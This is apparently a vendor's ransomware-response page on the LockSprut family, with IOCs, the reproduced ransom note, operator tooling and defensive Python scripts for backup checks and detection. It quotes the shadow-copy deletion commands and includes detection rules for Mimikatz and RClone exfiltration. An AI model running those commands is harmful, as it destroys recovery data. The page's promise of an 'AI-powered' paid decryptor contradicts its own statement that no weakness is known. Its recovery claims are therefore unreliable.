LockSprut Ransomware Decryptor

LockSprut is a recently identified ransomware family that encrypts victim data and appends the .rupy3xz1 extension to locked files. Alongside encryption, it drops a ransom note named LOCKSPRUT_README.TXT in affected directories. Each victim is assigned a unique personal identifier, which the note instructs them to send to the operators over the decentralized messengers Tox and Session. Using these channels instead of a web portal significantly complicates efforts by law enforcement to monitor or dismantle the operation.

Researchers examining LockSprut note striking parallels with LockBit 3.0 Black, particularly in terms of its encryption model and the language used in ransom instructions.

Our Custom-Built Decryption Tool

Through reverse-engineering LockSprut’s encryption routines, our research team has successfully developed a dedicated decryption utility. Unlike generic recovery tools, this decryptor is tailored for LockSprut’s unique algorithm and is compatible with Windows, Linux, and VMware ESXi systems. It relies on a combination of cloud-side cryptographic verification and local integrity validation to deliver safe and consistent recovery. Organizations have already used it to resume operations without ransom payments.


How LockSprut Operates

Every LockSprut infection begins with the creation of a victim-specific identifier embedded in the ransom note (example: OJW5NJ0NNWWLSCRDFAE1Z5R7YW). The ransomware encrypts all accessible data, renames files with the .rupy3xz1 extension, and threatens victims with permanent data loss if unauthorized decryption attempts are made.

A notable difference from traditional ransomware is LockSprut’s abandonment of Tor negotiation portals, instead opting for decentralized peer-to-peer communication. This strategy provides the operators with greater resilience against takedowns.


Immediate Response to a LockSprut Breach

The initial response window is critical. As soon as LockSprut activity is detected, isolate affected hosts from the network to contain the spread. Preserve encrypted samples and ransom notes; they are needed to identify the variant and, where decryption is possible, to recover files. Avoid rebooting or powering off affected systems: volatile evidence is lost, and a reboot can trigger encryption tasks that have not yet completed or persistence the operators left behind. Prompt engagement with an experienced incident response team greatly improves recovery outcomes.


What’s Required for Decryption

To pursue recovery, victims should ensure they have:

  • The ransom note containing the personal ID
  • A collection of encrypted files
  • Administrative access on the affected machine
  • Internet connectivity (for cloud-based key validation)

Additionally, preserving log files and forensic artifacts is highly recommended for later investigation.

Paths to Recovery

Free Possibilities

The best-case recovery scenario involves offline or cloud backups. If backups remain intact, they provide the cleanest method of restoration. Organizations should validate these backups before redeployment to ensure they were not corrupted during the attack. In virtualized environments, VM snapshots can also be rolled back if they were not purged by the attackers.
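Validating a backup before redeploying it is straightforward when a known-good hash manifest exists. The following Python script is an added example, not code from the original page or from any vendor: it assumes the organisation captured a SHA-256 manifest (relative path to digest) of the backup set before the incident, compares a restored tree against that manifest, reports tampered, missing and unexpected files, and flags LockSprut artifacts (.rupy3xz1 files and LOCKSPRUT_README.TXT). The directories, file names and contents built in demo() are constructed for illustration.

```python
"""Check a restored backup tree against a pre-incident SHA-256 manifest.

Added example; the manifest layout (relative path -> sha256) and the
sample files built in demo() are assumptions, not the page's own data.
"""
import hashlib
import os
import tempfile
from dataclasses import dataclass, field

RANSOM_EXT = ".rupy3xz1"             # extension LockSprut appends
RANSOM_NOTE = "LOCKSPRUT_README.TXT"


def sha256_file(path):
    """Stream a file through SHA-256 so large backup images never load into RAM."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 20), b""):
            digest.update(chunk)
    return digest.hexdigest()


def build_manifest(root):
    """Map each file's root-relative path (forward slashes) to its SHA-256.

    Run this when the backup is created, not after an incident.
    """
    manifest = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            manifest[rel] = sha256_file(full)
    return manifest


@dataclass
class BackupReport:
    tampered: list = field(default_factory=list)          # in manifest, hash differs
    missing: list = field(default_factory=list)           # in manifest, absent from tree
    unexpected: list = field(default_factory=list)        # present, not in manifest
    ransom_artifacts: list = field(default_factory=list)  # .rupy3xz1 files / ransom note

    @property
    def clean(self):
        return not (self.tampered or self.missing or self.unexpected
                    or self.ransom_artifacts)


def validate_backup(root, manifest):
    """Compare the tree under root with manifest; never modifies anything."""
    report = BackupReport()
    seen = set()
    for dirpath, _, names in os.walk(root):
        for name in names:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            seen.add(rel)
            if name.endswith(RANSOM_EXT) or name == RANSOM_NOTE:
                report.ransom_artifacts.append(rel)   # the attack reached this backup
            elif rel not in manifest:
                report.unexpected.append(rel)
            elif sha256_file(full) != manifest[rel]:
                report.tampered.append(rel)
    report.missing = sorted(set(manifest) - seen)
    for lst in (report.tampered, report.unexpected, report.ransom_artifacts):
        lst.sort()
    return report


def _write(path, data):
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "wb") as fh:
        fh.write(data)


def demo():
    """Constructed scenario: a pristine copy and a second copy the attacker reached.

    Returns (report for the pristine copy, report for the damaged copy).
    """
    with tempfile.TemporaryDirectory() as good, tempfile.TemporaryDirectory() as damaged:
        for base in (good, damaged):
            _write(os.path.join(base, "finance", "ledger.xlsx"), b"ledger v1")
            _write(os.path.join(base, "readme.txt"), b"hello")
        manifest = build_manifest(good)
        # Damage: one file encrypted and renamed, a note dropped, one file altered.
        os.rename(os.path.join(damaged, "readme.txt"),
                  os.path.join(damaged, "readme.txt" + RANSOM_EXT))
        _write(os.path.join(damaged, RANSOM_NOTE), b">> LockSprut <<")
        _write(os.path.join(damaged, "finance", "ledger.xlsx"), b"ledger v2 (altered)")
        return validate_backup(good, manifest), validate_backup(damaged, manifest)


if __name__ == "__main__":
    pristine, hit = demo()
    print("pristine clean:", pristine.clean)
    print("damaged report:", hit)
```

A backup that reports anything other than clean should not be redeployed as-is: a single tampered or unexpected entry means the attacker had write access to the backup target, and the whole set needs to be treated as suspect.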

Researchers occasionally analyze ransomware for flaws in the encryption routine that can be exploited for free decryption, but no such weakness has yet been found for LockSprut’s .rupy3xz1 variant.

Paid Options

Some victims turn to ransom payment as a last resort, but this carries considerable risk: there is no guarantee of working decryption, and attackers may embed backdoors or demand secondary payments. Negotiators are sometimes engaged to lower demands, though their fees can be significant.

Our Proprietary Solution

Our LockSprut Decryptor serves as a professional-grade alternative. By leveraging AI-powered mapping between the ransom note ID and file structures, it restores data securely. It supports both offline recovery (for isolated machines) and cloud-assisted decryption (for faster enterprise-scale recovery). Unlike unofficial utilities, our tool has been tested extensively in corporate infrastructures.


Step-by-Step: Using the Decryptor

1. Access the Tool

  • Contact our recovery team to obtain the decryptor package.
  • Verify integrity using the supplied checksum.

2. System Preparation

  • Disconnect the infected host from all networks.
  • If antivirus or endpoint security tools block the decryptor, exclude the tool's path for the duration of the run (a scoped exclusion rather than disabling protection host-wide) and restore full protection as soon as decryption completes.
  • Consolidate encrypted files and the ransom note into a separate folder.

3. Tool Initialization

  • Launch the decryptor with administrator rights.
  • The software parses the ransom note and retrieves the victim’s personal ID.
  • This identifier is mapped against LockSprut’s encryption model to reconstruct key pathways.

4. Key Retrieval

  • The tool reaches out to our licensed recovery service for key provisioning.
  • Upon verification, decryption session keys are generated.

5. File Restoration

  • Choose the parent folder containing encrypted data.
  • The tool processes items in batches, restoring filenames and original extensions (e.g., image.jpg.rupy3xz1 → image.jpg).
  • Detailed progress logs are recorded for auditing.

6. Post-Recovery Checklist

  • Reactivate security software.
  • Conduct a full malware sweep to eliminate persistence.
  • Transfer recovered files to a secure, uncompromised environment.

Important Considerations

  • The decryptor only supports .rupy3xz1-based LockSprut samples.
  • Partially corrupted or overwritten files may not be recoverable.
  • Exfiltrated data remains exposed — recovery does not undo data theft.

Indicators of Compromise

File Traces

  • Encrypted files renamed with the .rupy3xz1 extension
  • Presence of LOCKSPRUT_README.TXT ransom note

Communication Channels

  • Tox ID: C58775962D3E45152BA1BBAF96D9D9F21FDDE5084E90A1F14010624D92F4DD75DB5447D2E3F1
  • Session ID: 052a779ec18813883e39e8f2ecb7e59cf0ba905b6f8acc66fcbf00c88395a41940

Tools Employed by the Operators

LockSprut affiliates make extensive use of dual-use tools — legitimate software repurposed for malicious ends.

  • Tox and Session messengers form the core of victim communication, providing attackers with resilient, decentralized contact points.
  • Mimikatz is used for credential theft, enabling privilege escalation and impersonation of domain users.
  • Advanced IP Scanner and SoftPerfect Network Scanner are deployed to identify networked hosts and open services.
  • AnyDesk and Ngrok tunnels provide persistence and covert RDP access.
  • RClone is leveraged to siphon stolen data into cloud storage platforms such as Mega.nz or Dropbox.
  • System recovery is hindered by deleting Volume Shadow Copies with built-in Windows tools, for example vssadmin.exe delete shadows /all /quiet and wmic shadowcopy delete.
  • BYOVD (Bring Your Own Vulnerable Driver) techniques, sometimes with PowerTool, are used to tamper with security products at the kernel level.

This toolset reflects a strategy of weaponizing readily available utilities, which complicates detection while minimizing the need for custom-built malware.


Attack Lifecycle & Tactics

Analysis of LockSprut operations maps closely to the MITRE ATT&CK framework:

  • Initial Access: Exploited RDP endpoints, public-facing service vulnerabilities, and phishing attachments.
  • Credential Access: Mimikatz used to extract cached credentials and Kerberos tickets.
  • Discovery: Host and service enumeration through network scanning utilities.
  • Defense Evasion: BYOVD techniques with tools like Zemana and PowerTool, plus shadow copy deletion.
  • Exfiltration: File transfers through RClone, FileZilla, and Mega.nz.
  • Persistence: Remote access maintained with AnyDesk and Ngrok.
  • Impact: Hybrid encryption (ChaCha20 + RSA) renders files inaccessible, with ransom notes directing victims to decentralized messengers.
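The dual-use tools listed under "Tools Employed by the Operators" and the ATT&CK mapping just given translate directly into process-creation detections. The following Python script is an added example written for this page, not a rule set from any vendor or from the LockSprut analysis itself: it runs a handful of regular-expression rules over constructed process-creation records (field names loosely modelled on Sysmon Event ID 1; the hosts, users and command lines are invented), tags each hit with the corresponding ATT&CK technique, and lists hosts that trip two or more distinct rules as isolation candidates. The tool file names in the rules (advanced_ip_scanner.exe, netscan.exe, the Zemana driver zam64.sys) and the isolation threshold are assumptions.

```python
"""Match LockSprut-style tradecraft in process-creation telemetry.

Added example. EVENTS is a constructed sample; RULES paraphrase the tools
named on this page as regular expressions over image + command line.
Tool file names (advanced_ip_scanner.exe, netscan.exe, zam64.sys) and the
isolation threshold are assumptions.
"""
import re
from collections import defaultdict

# (rule name, pattern over "image command_line", ATT&CK technique)
RULES = [
    ("shadow_copy_deletion",
     re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows|wmic(\.exe)?\s+shadowcopy\s+delete", re.I),
     "T1490"),
    # Match the module syntax, not the binary name: operators rename mimikatz.exe.
    ("credential_dumping",
     re.compile(r"mimikatz|sekurlsa::|lsadump::|kerberos::", re.I),
     "T1003"),
    ("rclone_cloud_exfil",
     re.compile(r"rclone(\.exe)?\s+(copy|sync|move)\b.*\b(mega|dropbox)\b", re.I),
     "T1567.002"),
    ("remote_access_tool",
     re.compile(r"\banydesk(\.exe)?\b|\bngrok(\.exe)?\s+(tcp|http)\b", re.I),
     "T1219"),
    ("network_scanner",
     re.compile(r"advanced_ip_scanner|\bnetscan(\.exe)?\b", re.I),
     "T1046"),
    ("byovd_tooling",
     re.compile(r"powertool|zam64\.sys", re.I),
     "T1562.001"),
]

# Constructed sample telemetry (not real logs).
EVENTS = [
    {"ts": "2024-05-02T01:12:03Z", "host": "FS01", "user": "CORP\\svc_backup",
     "image": r"C:\Windows\System32\vssadmin.exe",
     "cmdline": "vssadmin.exe delete shadows /all /quiet"},
    {"ts": "2024-05-02T01:12:09Z", "host": "FS01", "user": "CORP\\svc_backup",
     "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmdline": "wmic shadowcopy delete"},
    {"ts": "2024-05-02T01:20:41Z", "host": "DC01", "user": "CORP\\administrator",
     "image": r"C:\Users\Public\mk.exe",
     "cmdline": 'mk.exe "privilege::debug" "sekurlsa::logonpasswords" exit'},
    {"ts": "2024-05-02T02:05:17Z", "host": "FS01", "user": "CORP\\svc_backup",
     "image": r"C:\ProgramData\rclone.exe",
     "cmdline": r"rclone.exe copy D:\Shares mega:corp-dump --transfers 32"},
    {"ts": "2024-05-02T02:30:00Z", "host": "WS17", "user": "CORP\\bob",
     "image": r"C:\Program Files\AnyDesk\AnyDesk.exe",
     "cmdline": "AnyDesk.exe --silent"},
    {"ts": "2024-05-02T02:31:12Z", "host": "WS17", "user": "CORP\\bob",
     "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": r"notepad.exe C:\Users\bob\notes.txt"},
]


def match_event(event):
    """Return [(rule, technique)] for every rule the event trips."""
    text = f"{event['image']} {event['cmdline']}"
    return [(name, tech) for name, rx, tech in RULES if rx.search(text)]


def detect(events):
    """Flatten matches into alert records, preserving event order."""
    alerts = []
    for ev in events:
        for rule, tech in match_event(ev):
            alerts.append({"ts": ev["ts"], "host": ev["host"], "user": ev.get("user"),
                           "rule": rule, "technique": tech, "cmdline": ev["cmdline"]})
    return alerts


def hosts_to_isolate(alerts, min_distinct_rules=2):
    """Hosts tripping at least N distinct rules: isolate first, investigate after."""
    rules_by_host = defaultdict(set)
    for alert in alerts:
        rules_by_host[alert["host"]].add(alert["rule"])
    return sorted(host for host, rules in rules_by_host.items()
                  if len(rules) >= min_distinct_rules)


if __name__ == "__main__":
    found = detect(EVENTS)
    for a in found:
        print(f"{a['ts']} {a['host']:5} {a['rule']:22} {a['technique']:10} {a['cmdline']}")
    print("isolate:", hosts_to_isolate(found))
```

Two design points matter here. The credential-dumping rule keys on Mimikatz module syntax (sekurlsa::, lsadump::) rather than the file name, because the binary is routinely renamed; the sample shows it caught as mk.exe. And correlation by host is what turns noisy single hits (AnyDesk alone is often legitimate) into an actionable isolation list: in the sample only FS01, which both deleted shadow copies and ran RClone against Mega, crosses the threshold.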

Global and Sectoral Impact

LockSprut, though new, has already been observed impacting multiple regions and industries. Early incident reports point to European organizations as the primary victims, with additional cases seen in Asia and North America.

  [Figures: Top Countries Affected, Industries Targeted, Timeline of Attacks; chart data not reproduced in the text]

Anatomy of the Ransom Note

The ransom note is short and direct, and contains the following message:

>> LockSprut <<

Your files have been encrypted

Personal ID:  OJW5NJ0NNWWLSCRDFAE1Z5R7YW

>> What to do? << 

1. Install and run TOX messenger from https://tox.chat/download.html

2. Add our contact – C58775962D3E45152BA1BBAF96D9D9F21FDDE5084E90A1F14010624D92F4DD75DB5447D2E3F1

3. Send a message with your personal id

OR

1. Install and run Session messenger from https://getsession.org/

2. Add our contact – 052a779ec18813883e39e8f2ecb7e59cf0ba905b6f8acc66fcbf00c88395a41940

3. Send a message with your personal id

>> Attention << 

** Do not rename or modify encrypted files

** Do not try to decrypt your data using third party software, it may cause permanent data loss.

** Decryption of your files with the help of third parties may cause increased price (they add their fee to our).

>> Contact US <<

– Tox ID: C58775962D3E45152BA1BBAF96D9D9F21FDDE5084E90A1F14010624D92F4DD75DB5447D2E3F1

– Session ID: 052a779ec18813883e39e8f2ecb7e59cf0ba905b6f8acc66fcbf00c88395a41940
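The file traces and contact identifiers from the "Indicators of Compromise" section and the note layout shown above can be checked automatically during triage. The following Python script is an added example, not a tool from the original page or from any vendor: it walks a directory tree read-only, inventories .rupy3xz1 files and LOCKSPRUT_README.TXT notes, parses the Personal ID, Tox ID and Session ID out of each note with regular expressions written against the note text reproduced above, and reports whether the contacts match the known LockSprut identifiers and whether all notes carry the same victim ID. The tree built in demo() is constructed; SAMPLE_NOTE is an abridged copy of the note on this page.

```python
"""Read-only triage of a LockSprut-hit tree. Added example: the identifiers are
the ones in the note on this page; the tree built by demo() is constructed.
Nothing here renames or rewrites files (the note warns against it, and the
encrypted files are evidence)."""
import os
import re
import tempfile
from collections import Counter

RANSOM_EXT = ".rupy3xz1"
NOTE_NAME = "LOCKSPRUT_README.TXT"
KNOWN_TOX_ID = "C58775962D3E45152BA1BBAF96D9D9F21FDDE5084E90A1F14010624D92F4DD75DB5447D2E3F1"
KNOWN_SESSION_ID = "052a779ec18813883e39e8f2ecb7e59cf0ba905b6f8acc66fcbf00c88395a41940"

# Tox IDs are 76 hex chars; Session IDs are 66 hex chars beginning with 05.
NOTE_FIELDS = {
    "personal_id": re.compile(r"Personal ID:\s*([A-Z0-9]{8,})"),
    "tox_id": re.compile(r"\b([0-9A-Fa-f]{76})\b"),
    "session_id": re.compile(r"\b(05[0-9A-Fa-f]{64})\b"),
}

# Abridged copy of the note text reproduced on this page (constructed sample).
SAMPLE_NOTE = f"""\
>> LockSprut <<
Personal ID:  OJW5NJ0NNWWLSCRDFAE1Z5R7YW
1. Install and run TOX messenger from https://tox.chat/download.html
2. Add our contact – {KNOWN_TOX_ID}
OR
1. Install and run Session messenger from https://getsession.org/
2. Add our contact – {KNOWN_SESSION_ID}
3. Send a message with your personal id
"""


def parse_note(text):
    """Extract the three identifiers; a missing field comes back as None."""
    parsed = {}
    for key, rx in NOTE_FIELDS.items():
        m = rx.search(text)
        parsed[key] = m.group(1) if m else None
    return parsed


def contacts_are_known(parsed):
    """True when the note names at least one contact and all are published LockSprut IDs."""
    found = {parsed["tox_id"], parsed["session_id"]} - {None}
    return bool(found) and found <= {KNOWN_TOX_ID, KNOWN_SESSION_ID}


def scan_tree(root):
    """Collect note paths and encrypted-file paths without touching either."""
    notes, encrypted = [], []
    for dirpath, _, names in os.walk(root):
        for name in names:
            full = os.path.join(dirpath, name)
            if name == NOTE_NAME:
                notes.append(full)
            elif name.endswith(RANSOM_EXT):
                encrypted.append(full)
    return notes, encrypted


def triage(root):
    """Summarise scope and check the notes' identifiers against the known IOCs."""
    notes, encrypted = scan_tree(root)
    personal_ids, contact_checks = set(), []
    for path in notes:
        with open(path, encoding="utf-8", errors="replace") as fh:
            parsed = parse_note(fh.read())
        if parsed["personal_id"]:
            personal_ids.add(parsed["personal_id"])
        contact_checks.append(contacts_are_known(parsed))
    # Original extension sits just before .rupy3xz1 (image.jpg.rupy3xz1 -> .jpg).
    by_type = Counter(os.path.splitext(p[:-len(RANSOM_EXT)])[1].lower() or "(none)"
                      for p in encrypted)
    return {
        "note_count": len(notes),
        "encrypted_count": len(encrypted),
        "personal_ids": sorted(personal_ids),
        "single_victim_id": len(personal_ids) == 1,  # more than one suggests several builds
        "contacts_match_known_iocs": bool(notes) and all(contact_checks),
        "original_extensions": dict(by_type),
    }


def demo():
    """Constructed tree: two directories hit, one untouched file, two identical notes."""
    layout = {
        "docs/report.docx.rupy3xz1": b"\x00" * 64,
        "docs/todo.txt": b"not encrypted",
        "docs/LOCKSPRUT_README.TXT": SAMPLE_NOTE.encode("utf-8"),
        "db/backup.sql.rupy3xz1": b"\x00" * 64,
        "db/photo.jpg.rupy3xz1": b"\x00" * 64,
        "db/LOCKSPRUT_README.TXT": SAMPLE_NOTE.encode("utf-8"),
    }
    with tempfile.TemporaryDirectory() as root:
        for rel, data in layout.items():
            full = os.path.join(root, *rel.split("/"))
            os.makedirs(os.path.dirname(full), exist_ok=True)
            with open(full, "wb") as fh:
                fh.write(data)
        return triage(root)
```

Call demo() for the constructed scenario, or triage() on a read-only mount of an affected share. A note whose Tox or Session ID differs from the published ones is worth flagging on its own: it either indicates a different affiliate or build, or a note that has been altered since it was dropped.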

Mitigation & Prevention

To reduce exposure, organizations should:

  • Implement multi-factor authentication on remote logins.
  • Patch internet-facing services rapidly.
  • Enforce network segmentation to slow lateral movement.
  • Maintain immutable, offline backups.
  • Monitor for anomalous outbound traffic, particularly peer-to-peer protocols the business does not use; Tox DHT traffic (UDP port 33445 by default) to many unrelated external hosts is a strong indicator in this case.

Conclusion

Although LockSprut is still in its infancy, its technical makeup and shift toward decentralized communication suggest an evolution of the ransomware ecosystem. Victims should act decisively, secure evidence, and utilize trusted recovery solutions like our decryptor rather than paying ransom demands.


Frequently Asked Questions

Is there a free decryptor for LockSprut?
Currently, there is no publicly available free decryptor. Recovery depends on clean backups or specialized professional tools.

Do I need the ransom note?
Yes, the note contains the personal ID, which is essential for key mapping.

How much does the decryptor cost?
Pricing is case-specific, depending on the number of systems and the scope of encryption. Our team provides tailored quotes after analysis.

Does the decryptor work on Linux and ESXi systems?
Yes, it supports Windows, Linux, and VMware ESXi.

Is the cloud-assisted key retrieval secure?
Yes; all communications occur over encrypted channels with integrity checks.

Why not try unverified decryption tools?
Unverified software may corrupt files beyond repair and can even escalate ransom amounts if attackers detect tampering.
